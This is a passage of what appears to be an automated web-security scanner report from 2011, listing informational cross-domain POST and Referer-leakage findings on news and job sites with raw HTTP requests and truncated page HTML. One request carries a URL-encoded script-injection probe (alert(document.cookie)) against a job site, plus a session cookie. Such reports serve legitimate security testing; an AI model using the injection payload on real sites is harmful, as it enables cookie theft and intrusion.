<input name="partner_id" value="" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge"><input value="Sign Up" type="submit" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u841959_1&quot;).login();"><b>log in</b></a> to see what your friends like.<img class="fbSocialWidgetTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_box&amp;extra_2=US" /></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg" alt="JD2B" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><span class="name">JD2B</span></a></div><div><div id="connect_widget_4d3a06a390ec06634143078" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>JD2B</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_admin_option">Admin Page</a>
...[SNIP]...

13. Cross-domain POST
There are 5 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


13.1. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:

Request

GET /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Length: 82676
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=3340
Expires: Fri, 21 Jan 2011 23:20:37 GMT
Date: Fri, 21 Jan 2011 22:24:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- else -->

<ti
...[SNIP]...
<div id="sign-up-form">
       <form name="form" style="padding: 0; margin: 0;" method="post" action="http://links.mkt1259.com/servlet/UserSignUp?f=231711&postMethod=HTML&m=0&j=MAS2">
       <!-- e-mail field -->
...[SNIP]...

13.2. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:

Request

GET /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Length: 75123
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=3361
Expires: Fri, 21 Jan 2011 23:21:02 GMT
Date: Fri, 21 Jan 2011 22:25:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- else -->

<ti
...[SNIP]...
<div id="sign-up-form">
       <form name="form" style="padding: 0; margin: 0;" method="post" action="http://links.mkt1259.com/servlet/UserSignUp?f=231711&postMethod=HTML&m=0&j=MAS2">
       <!-- e-mail field -->
...[SNIP]...

13.3. http://www.hototc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hototc.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.hototc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:30:08 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "45f8-4cca7a20-0"
Last-Modified: Fri, 29 Oct 2010 07:39:12 GMT
Content-Type: text/html
Content-Length: 17912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="SignUpBar">
           <form name="ccoptin2" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post">
               <input type="hidden" name="m" value="1101684818180">
...[SNIP]...

13.4. http://www.hototc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hototc.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.hototc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:30:08 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "45f8-4cca7a20-0"
Last-Modified: Fri, 29 Oct 2010 07:39:12 GMT
Content-Type: text/html
Content-Length: 17912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</p>
           <form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post">
               <p>
...[SNIP]...

13.5. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /money/world/2011-01-20-chinabuilding20_ST_N.htm

Issue detail

The page contains a form which POSTs data to the domain usatoday.franchisesolutions.com. The form contains the following fields:

Request

GET /money/world/2011-01-20-chinabuilding20_ST_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 22 Jan 2011 01:23:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 71520
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<script type="text/javascript" src="http://i.usatoday.net/_common/_scripts/_
...[SNIP]...
<table border="0" cellspacing="0" cellpadding="0">
                       <FORM name="finder" action="http://usatoday.franchisesolutions.com/index.cfm/fa/finderaction" method="post">
                           <input type="hidden" name="nologging" value=0>
...[SNIP]...

14. Cross-domain Referer leakage
There are 24 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


14.1. http://www.100kcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.100kcrossing.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?f63f4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E34aed88ca0a=1 HTTP/1.1
Host: www.100kcrossing.com
Proxy-Connection: keep-alive
Referer: http://www.100kcrossing.com/?f63f4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E34aed88ca0a=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7556cua1kmjisgrmbs54t62tc7; flagimg=UnitedStates.gif; useripcountry=277; useripstate=3896; useripcity=2655979; usercountry=277; userstate=3896; usercity=2655979; regioninfo=2655979%7E32.7830556%7E-96.8066667; __utmz=1.1295654883.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=1.1903501068.1295654883.1295654883.1295654883.1; __utmc=1; __utmb=1.1.10.1295654883

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:07:28 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: Keep-alive
Via: 1.1 AN-0016020122545304
Content-Length: 106674

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Article RSS Feed" href="http://www.100kcrossing.com/rssfeed/xml/rssfeedarticle.xml" />
<link rel="stylesheet" type="text/css" href="http://css.employmentcrossing.com/style.css">
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<td width="9"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a94f730c&amp;cb=558459' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=345&amp;n=a94f730c&amp;' border='0' alt='' /></a>
...[SNIP]...
<td colspan="2" height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.100kcrossing.com/" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image1','','http://images.employmentcrossing.com/img_home.jpg',1)"><img src="http://images.employmentcrossing.com/6figure/logo.gif" border="0" alt="$100K Jobs, Jobs in $100K - 100KCrossing.com" title="$100K Jobs, Jobs in $100K - 100KCrossing.com"></a><img src="http://images.employmentcrossing.com/img_jobagreegators.gif" name="Image1" border="0" alt="Job Aggregators - 100KCrossing.com" title="Job Aggregators - 100KCrossing.com" align="top" style="margin:2px 0px 0px 5px;">
<br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<a href="javascript:pageTracker._link('https://www.employmentcrossing.com/lcsignin.php?refid=1553&offer_page=111&pg=index.php&uia=MTczLjE5My4yMTQuMjQz');"><img src="http://images.employmentcrossing.com/bt_jobseekers.gif" width="111" height="24" border="0" alt="Job Seekers - Try IT Now" title="Job Seekers - Try IT Now" align="absmiddle"></a>&nbsp;&nbsp;<a href="http://www.100kcrossing.com/lcpostnowjob.php"><img src="http://images.employmentcrossing.com/bt_employers.gif" width="111" height="24" border="0" alt="Employers - Try IT Now" title="Employers - Try IT Now" align="absmiddle"></a>
...[SNIP]...
<td><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="7" border="0" alt=""><br>
...[SNIP]...
<td width="499" valign="top"><img src="http://images.employmentcrossing.com/central_image/419_100k.jpg" width="499" border="0" alt="The Most Quality $100K Jobs Anywhere - 100KCrossing" title="The Most Quality $100K Jobs Anywhere - 100KCrossing"></td>
...[SNIP]...
<td colspan="2" height="5" class="bgmain"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%" height="43"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="10" border="0" alt=""><br>
...[SNIP]...
<a href="javascript:NewWindow('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.EMPLOYMENTCROSSING.COM&lang=en','verisign','562','500','yes');"><img src="http://images.employmentcrossing.com/img_verisign.gif" width="89" height="40" border="0" alt="VeriSign Secure Site" title="VeriSign Secure Site"></a>
...[SNIP]...
<td width="100%" height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
<link rel="stylesheet" type="text/css" href="http://css.employmentcrossing.com/jquery/jquery.autocomplete.css" />
<style type="text/css">
...[SNIP]...
<td width="7" rowspan="3"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="7" rowspan="3"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="15" border="0" alt=""><br>
...[SNIP]...
</table>
<img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="10" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="20" border="0" alt=""><br>
...[SNIP]...
<td height="12" colspan="2"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%" height="15" class="bgmain"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%"><img src="http://images.employmentcrossing.com/img_jobsearch.gif" width="700" height="216" border="0" alt="Compare 100KCrossing with other job sites" title="Compare 100KCrossing with other job sites"></td>
...[SNIP]...
<td class="bgmain" height="20"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10" height="27"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="7" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="7" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%" class="bgmain" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="4" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
               <td width="120" class="imgtext" style="padding-left:0px;" valign="top">
<img src="http://images.employmentcrossing.com/employment/articleimages/harrison_small.jpg" width="109" height="123" border="0" class="articleimg" alt="CEO A Harrision Barnes - 100KCrossing.com" title="CEO A Harrision Barnes - 100KCrossing.com">
<br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
<a href="http://twitter.com/aharrisonbarnes" target="_blank"><img src="http://images.employmentcrossing.com/twitter_followme.jpg" width="95" height="22" border="0" alt="Follow Me on Twitter" title="Follow Me on Twitter"></a>
...[SNIP]...
<span class="textgray17"><a href="http://www.employmentcrossing.com/lcceospeaks.php?id=5482" style="color:#0a75cc;">Being in the Zone</a>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="3" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<div align="right"><a href="http://www.employmentcrossing.com/lcceospeaks.php?id=5482"><strong>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="4" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
           <td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<td><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="4" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="20"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="12"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<noscript>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="262" height="210" id="map" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.100kcrossing.com/lcresumecritique.php"><img src="http://images.employmentcrossing.com/free_resume.jpg" width="265" height="100" border="0" alt=""></a>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.100kcrossing.com/lcjsjobdetail.php?akey=8f1b06c64c76ee1d3cf6af16b91f0a79"><img src="http://images.employmentcrossing.com/bt_clicktoapply.jpg" width="111" height="23" border="0" alt="Click to Apply for - 100KCrossing.com" title="Click to Apply for - 100KCrossing.com"></a>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<div align="right"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="4" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td align="center"><img src="http://images.employmentcrossing.com/img_trustedlogo.jpg" width="251" height="107" border="0" alt=""></td>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="2" style="background:url(http://images.employmentcrossing.com/dot.gif);"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<br>+ <a href="http://www.employmentcrossing.com/lctestimonials.php" target="_blank"><u>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="10" height="1" border="0" alt=""></td>
...[SNIP]...
</a>&nbsp;&nbsp;<img src="http://images.employmentcrossing.com/icon_closewindow.gif" width="11" height="12" border="0" alt="" align="absmiddle"></div>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="7" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="7" border="0" alt=""><br>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="10" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
</u><img src="http://images.employmentcrossing.com/blanker.gif" width="30" height="1" border="0" alt="">
<strong>
...[SNIP]...
</u><img src="http://images.employmentcrossing.com/blanker.gif" width="30" height="1" border="0" alt="">
<span class="textblue1" style="font-size:14px;">
...[SNIP]...
<td width="18"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.100kcrossing.com/leadingemployers.php"><img src="http://images.employmentcrossing.com/img_leadingemployers.jpg" width="163" height="21" border="0" alt="Leading Employers" title="Leading Employers"></a>
...[SNIP]...
<a href="javascript:tellafriend('H');"><img src="http://images.employmentcrossing.com/img_tellafriend.jpg" width="95" height="21" border="0" alt="Tell a Friend!" title="Tell a Friend!"></a>
...[SNIP]...
<td><a href="http://twitter.com/100KXing" target="_blank"><img src="http://images.employmentcrossing.com/twitter.jpg" width="163" height="21" border="0" alt="Follow 100KCrossing.com on Twitter" title="Follow 100KCrossing.com on Twitter"></a>
...[SNIP]...
<td width="95"><a href="http://www.facebook.com/pages/100KCrossing/351664632951" target="_blank"><img src="http://images.employmentcrossing.com/facebook.jpg" width="95" height="21" border="0" alt="Be a Fan of 100KCrossing on Facebook - 100KCrossing.com" title="Be a Fan of 100KCrossing on Facebook - 100KCrossing.com"></a>
...[SNIP]...
<td height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
</a> |
                                        <a href="http://www.employmentcrossing.com/lctestimonials.php" target="_blank">Testimonials</a>
...[SNIP]...
<br>
<a href="http://www.employmentcrossing.com/" target="_blank">Jobs</a>
...[SNIP]...
<a/> |
                               <a href="http://www.preferredresumes.com/" target="_blank">Resume Writing Service</a> |
                               <a href="http://www.resumeboomer.com" target="_blank">Post Resume</a> |
                               <a href="http://www.recruitersubmitter.com/" target="_blank">Send Resume</a> |
                               <a href="http://www.employmentauthority.com/" target="_blank">Resume Distribution</a> |
                               <a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a> |
